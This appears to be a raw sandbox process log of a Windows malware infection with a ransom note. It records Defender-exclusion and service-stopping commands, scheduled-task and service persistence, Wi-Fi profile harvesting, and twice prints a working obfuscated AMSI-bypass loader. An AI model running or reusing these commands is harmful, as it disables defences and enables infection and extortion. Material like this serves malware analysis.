C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc

C:\Windows\system32\SppExtComObj.exe

C:\Windows\system32\SppExtComObj.exe -Embedding

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe

"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc

C:\Users\Admin\AppData\Local\Temp\primate protocol.exe

"C:\Users\Admin\AppData\Local\Temp\primate protocol.exe"

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAawBtACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGUAZQBmACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcASABFAEEARABTAEUAVAAgAE4ATwBUACAARABFAFQARQBDAFQARQBEACcALAAnACcALAAnAE8ASwAnACwAJwBFAHIAcgBvAHIAJwApADwAIwBuAGYAZwAjAD4A"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AZwBiACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHoAbgBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAYgBsACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGoAawBmACMAPgA="

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\systemprocess.exe

"C:\Windows\systemprocess.exe"

C:\Windows\host.exe

"C:\Windows\host.exe"

C:\Windows\CompPkg.exe

"C:\Windows\CompPkg.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "HOST" /sc ONLOGON /tr "C:\Windows\systemprocess.exe" /rl HIGHEST /f

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "CompPkg" /tr "C:\Users\Admin\AppData\Roaming\CompPkg.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\CompPkg.exe

C:\Users\Admin\AppData\Roaming\CompPkg.exe

C:\Users\Admin\AppData\Roaming\CompPkg.exe

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

C:\Windows\SYSTEM32\netsh.exe

"netsh" wlan show profiles

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "$([System.Environment]::GetEnvironmentVariable('SystemDrive'))\"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\system32\dialer.exe

C:\Windows\system32\dialer.exe

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe delete "PROCESS HOST"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe create "PROCESS HOST" binpath= "C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe" start= "auto"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:OdjsqXVEoMxo{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$yfmVlGOStjgHBO,[Parameter(Position=1)][Type]$UJRGIblVoq)$hIprbDofzkL=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'ef'+[Char](108)+''+'e'+''+[Char](99)+''+[Char](116)+''+[Char](101)+''+[Char](100)+''+'D'+'e'+[Char](108)+''+[Char](101)+'g'+'a'+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+''+[Char](77)+''+[Char](101)+''+[Char](109)+'o'+'r'+''+[Char](121)+''+'M'+'o'+'d'+''+[Char](117)+''+'l'+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+'y'+''+'D'+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+'t'+[Char](101)+''+[Char](84)+''+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+'C'+''+'l'+''+[Char](97)+''+'s'+''+'s'+','+'P'+''+[Char](117)+'b'+'l'+'i'+[Char](99)+''+[Char](44)+''+'S'+''+[Char](101)+''+'a'+''+[Char](108)+''+[Char](101)+''+[Char](100)+''+[Char](44)+''+[Char](65)+''+[Char](110)+''+[Char](115)+'i'+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+','+'A'+''+[Char](117)+''+[Char](116)+''+'o'+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+'s',[MulticastDelegate]);$hIprbDofzkL.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+'p'+'e'+[Char](99)+''+'i'+'a'+[Char](108)+'N'+'a'+''+[Char](109)+''+[Char](101)+''+','+''+[Char](72)+''+[Char](105)+''+[Char](100)+'eB'+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+','+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$yfmVlGOStjgHBO).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+[Char](116)+''+[Char](105)+''+'m'+''+[Char](101)+''+[Char](44)+'M'+'a'+'n'+'a'+'g'+[Char](101)+''+[Char](100)+'');$hIprbDofzkL.DefineMethod(''+'I'+''+'n'+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+'e'+'','P'+'u'+''+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+''+','+''+[Char](72)+''+[Char](105)+'d'+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+'i'+'g'+''+','+''+[Char](78)+''+[Char](101)+''+[Char](119)+''+'S'+'lo'+'t'+''+','+''+[Char](86)+''+[Char](105)+'r'+'t'+''+'u'+''+[Char](97)+''+[Char](108)+'',$UJRGIblVoq,$yfmVlGOStjgHBO).SetImplementationFlags(''+'R'+''+'u'+'n'+[Char](116)+''+'i'+''+[Char](109)+''+'e'+','+[Char](77)+'a'+'n'+''+'a'+'g'+'e'+''+'d'+'');Write-Output $hIprbDofzkL.CreateType();}$vyVsTzFyMRkLJ=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'yst'+[Char](101)+''+[Char](109)+'.dl'+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+'r'+''+[Char](111)+''+[Char](115)+''+'o'+''+[Char](102)+''+[Char](116)+''+[Char](46)+''+'W'+''+[Char](105)+''+'n'+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](85)+''+[Char](110)+'s'+'a'+''+'f'+''+[Char](101)+''+'N'+''+'a'+''+[Char](116)+''+'i'+''+[Char](118)+''+[Char](101)+'M'+[Char](101)+''+'t'+'h'+[Char](111)+''+[Char](100)+''+'s'+'');$bYPnAmzEfuscSx=$vyVsTzFyMRkLJ.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+[Char](99)+''+'A'+''+[Char](100)+''+[Char](100)+''+'r'+''+[Char](101)+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+''+'i'+'c'+','+''+'S'+'t'+'a'+''+'t'+''+'i'+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$ZDRpFjDocdPWEvpSmDG=OdjsqXVEoMxo @([String])([IntPtr]);$nfWTHpcRSoEqqeFdfiOtpn=OdjsqXVEoMxo @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$wEXXhkFtbyb=$vyVsTzFyMRkLJ.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+[Char](77)+''+'o'+'d'+[Char](117)+''+[Char](108)+'e'+[Char](72)+''+[Char](97)+''+[Char](110)+''+[Char](100)+'l'+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+'e'+[Char](114)+''+[Char](110)+''+[Char](101)+'l'+'3'+'2.'+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$oleLiZxwkOLAwO=$bYPnAmzEfuscSx.Invoke($Null,@([Object]$wEXXhkFtbyb,[Object](''+[Char](76)+'o'+[Char](97)+''+'d'+''+[Char](76)+'ib'+'r'+''+'a'+''+[Char](114)+''+'y'+''+'A'+'')));$PiJGUFQYEknHQZPKx=$bYPnAmzEfuscSx.Invoke($Null,@([Object]$wEXXhkFtbyb,[Object](''+[Char](86)+''+'i'+''+[Char](114)+''+'t'+''+[Char](117)+'a'+[Char](108)+'P'+[Char](114)+''+[Char](111)+''+[Char](116)+''+[Char](101)+''+[Char](99)+'t')));$HEIoPYX=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($oleLiZxwkOLAwO,$ZDRpFjDocdPWEvpSmDG).Invoke(''+[Char](97)+''+[Char](109)+''+[Char](115)+''+'i'+'.'+[Char](100)+''+[Char](108)+''+[Char](108)+'');$uXiOiPrfOfLHHnfYI=$bYPnAmzEfuscSx.Invoke($Null,@([Object]$HEIoPYX,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+'i'+'S'+[Char](99)+''+'a'+'nB'+[Char](117)+''+[Char](102)+''+[Char](102)+'er')));$zhrGrazrmt=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PiJGUFQYEknHQZPKx,$nfWTHpcRSoEqqeFdfiOtpn).Invoke($uXiOiPrfOfLHHnfYI,[uint32]8,4,[ref]$zhrGrazrmt);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$uXiOiPrfOfLHHnfYI,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PiJGUFQYEknHQZPKx,$nfWTHpcRSoEqqeFdfiOtpn).Invoke($uXiOiPrfOfLHHnfYI,[uint32]8,0x20,[ref]$zhrGrazrmt);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SO'+'F'+''+[Char](84)+''+[Char](87)+''+'A'+''+[Char](82)+'E').GetValue(''+[Char](100)+''+'i'+''+[Char](97)+''+[Char](108)+'e'+[Char](114)+''+[Char](115)+''+'t'+''+[Char](97)+'g'+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop eventlog

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe start "PROCESS HOST"

C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe

C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\system32\dialer.exe

C:\Windows\system32\dialer.exe

C:\Windows\system32\dialer.exe

C:\Windows\system32\dialer.exe

C:\Windows\system32\dialer.exe

dialer.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:hUtTGcpIBRWx{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$cuszbhKDZHUugU,[Parameter(Position=1)][Type]$TzthIiuPXy)$BpDXKpeuMBK=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+'c'+''+[Char](116)+''+[Char](101)+''+[Char](100)+''+[Char](68)+''+'e'+''+'l'+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'nM'+'e'+''+'m'+''+'o'+'ry'+[Char](77)+''+'o'+''+[Char](100)+'ul'+[Char](101)+'',$False).DefineType(''+[Char](77)+''+'y'+''+[Char](68)+''+[Char](101)+''+'l'+''+[Char](101)+'g'+[Char](97)+''+[Char](116)+'e'+[Char](84)+''+[Char](121)+''+'p'+''+'e'+'',''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+'s'+','+''+'P'+''+[Char](117)+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+'S'+'e'+'a'+'l'+'e'+[Char](100)+''+','+''+[Char](65)+''+[Char](110)+''+[Char](115)+''+[Char](105)+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+','+'A'+''+[Char](117)+''+'t'+''+'o'+''+[Char](67)+'l'+[Char](97)+'s'+[Char](115)+'',[MulticastDelegate]);$BpDXKpeuMBK.DefineConstructor(''+'R'+'T'+'S'+'p'+[Char](101)+'c'+[Char](105)+''+[Char](97)+'lN'+[Char](97)+'m'+'e'+','+'H'+'i'+[Char](100)+''+[Char](101)+'B'+[Char](121)+''+[Char](83)+'ig,'+[Char](80)+'u'+[Char](98)+'l'+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$cuszbhKDZHUugU).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+'t'+[Char](105)+''+[Char](109)+'e'+','+'Man'+[Char](97)+''+[Char](103)+'e'+[Char](100)+'');$BpDXKpeuMBK.DefineMethod(''+'I'+'n'+[Char](118)+''+[Char](111)+''+'k'+''+[Char](101)+'','P'+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+'c,'+'H'+''+[Char](105)+''+[Char](100)+''+'e'+''+'B'+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](78)+''+[Char](101)+'w'+[Char](83)+'l'+[Char](111)+''+[Char](116)+''+[Char](44)+''+[Char](86)+''+[Char](105)+'r'+[Char](116)+''+[Char](117)+''+[Char](97)+''+'l'+'',$TzthIiuPXy,$cuszbhKDZHUugU).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+'a'+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $BpDXKpeuMBK.CreateType();}$AeIOUWqdeFhrt=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+'s'+[Char](116)+''+'e'+'m'+[Char](46)+''+[Char](100)+'l'+[Char](108)+'')}).GetType(''+'M'+''+[Char](105)+''+[Char](99)+''+'r'+''+'o'+''+[Char](115)+''+[Char](111)+'ft'+[Char](46)+''+[Char](87)+''+[Char](105)+''+[Char](110)+''+[Char](51)+''+'2'+''+[Char](46)+''+'U'+''+[Char](110)+'s'+[Char](97)+''+'f'+''+[Char](101)+''+'N'+''+[Char](97)+''+'t'+''+[Char](105)+'ve'+[Char](77)+''+[Char](101)+''+[Char](116)+''+[Char](104)+''+[Char](111)+''+[Char](100)+''+'s'+'');$iTlDFUyQFnghAn=$AeIOUWqdeFhrt.GetMethod('G'+[Char](101)+''+[Char](116)+''+[Char](80)+''+[Char](114)+'o'+[Char](99)+''+[Char](65)+''+[Char](100)+''+[Char](100)+''+'r'+''+[Char](101)+''+[Char](115)+''+'s'+'',[Reflection.BindingFlags](''+[Char](80)+''+'u'+''+'b'+''+[Char](108)+'i'+'c'+','+[Char](83)+''+'t'+'a'+[Char](116)+''+'i'+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$ZlMhhgPuJPEJZMiKYVc=hUtTGcpIBRWx @([String])([IntPtr]);$DGoBTzKEyyvelOULPFuXKR=hUtTGcpIBRWx @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$erEVRAlXqJK=$AeIOUWqdeFhrt.GetMethod(''+'G'+''+'e'+''+[Char](116)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+'u'+'l'+'e'+''+[Char](72)+''+'a'+''+[Char](110)+''+'d'+'l'+'e'+'').Invoke($Null,@([Object](''+'k'+''+[Char](101)+''+'r'+''+'n'+'e'+'l'+''+[Char](51)+''+[Char](50)+''+'.'+''+[Char](100)+'l'+'l'+'')));$OkQLxsSoUiELgP=$iTlDFUyQFnghAn.Invoke($Null,@([Object]$erEVRAlXqJK,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+''+'d'+''+[Char](76)+''+[Char](105)+''+[Char](98)+'r'+[Char](97)+''+[Char](114)+''+'y'+''+'A'+'')));$JRRmeUNoqiZyPvdtP=$iTlDFUyQFnghAn.Invoke($Null,@([Object]$erEVRAlXqJK,[Object](''+[Char](86)+'i'+[Char](114)+'t'+[Char](117)+''+[Char](97)+''+'l'+''+[Char](80)+'r'+'o'+''+[Char](116)+''+[Char](101)+''+[Char](99)+'t')));$eycvYqX=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OkQLxsSoUiELgP,$ZlMhhgPuJPEJZMiKYVc).Invoke(''+[Char](97)+''+[Char](109)+''+'s'+''+'i'+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'');$dBFykBqhboaywzxVD=$iTlDFUyQFnghAn.Invoke($Null,@([Object]$eycvYqX,[Object](''+[Char](65)+''+'m'+'s'+[Char](105)+'S'+[Char](99)+''+[Char](97)+'nB'+'u'+''+[Char](102)+'fe'+'r'+'')));$aYFVrPYVCg=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($JRRmeUNoqiZyPvdtP,$DGoBTzKEyyvelOULPFuXKR).Invoke($dBFykBqhboaywzxVD,[uint32]8,4,[ref]$aYFVrPYVCg);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$dBFykBqhboaywzxVD,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($JRRmeUNoqiZyPvdtP,$DGoBTzKEyyvelOULPFuXKR).Invoke($dBFykBqhboaywzxVD,[uint32]8,0x20,[ref]$aYFVrPYVCg);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+''+[Char](70)+'T'+[Char](87)+''+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](100)+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+[Char](101)+'r'+[Char](115)+'t'+[Char](97)+''+'g'+''+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)"

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{3dc28f87-b8e3-4dfa-a166-a006b4a498ba}

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{ec80ab00-b363-4b21-bbe8-85111939d665}

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Users\Admin\AppData\Roaming\CompPkg.exe

C:\Users\Admin\AppData\Roaming\CompPkg.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff982dedcf8,0x7ff982dedd04,0x7ff982dedd10

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1980,i,15884832059890627897,13472977586051003899,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=1976 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1476,i,15884832059890627897,13472977586051003899,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=2240 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2372,i,15884832059890627897,13472977586051003899,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=2248 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3144,i,15884832059890627897,13472977586051003899,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=3200 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3152,i,15884832059890627897,13472977586051003899,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=3244 /prefetch:1

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4400,i,15884832059890627897,13472977586051003899,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=4420 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4660,i,15884832059890627897,13472977586051003899,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=4704 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\Desktop\How To Decrypt My Files.html

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x2cc,0x2d0,0x2d4,0x2c8,0x368,0x7ff96d53f208,0x7ff96d53f214,0x7ff96d53f220

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1808,i,16324875341636741138,164245467812944278,262144 --variations-seed-version --mojo-platform-channel-handle=2376 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2352,i,16324875341636741138,164245467812944278,262144 --variations-seed-version --mojo-platform-channel-handle=2344 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=1924,i,16324875341636741138,164245467812944278,262144 --variations-seed-version --mojo-platform-channel-handle=2384 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3480,i,16324875341636741138,164245467812944278,262144 --variations-seed-version --mojo-platform-channel-handle=3508 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

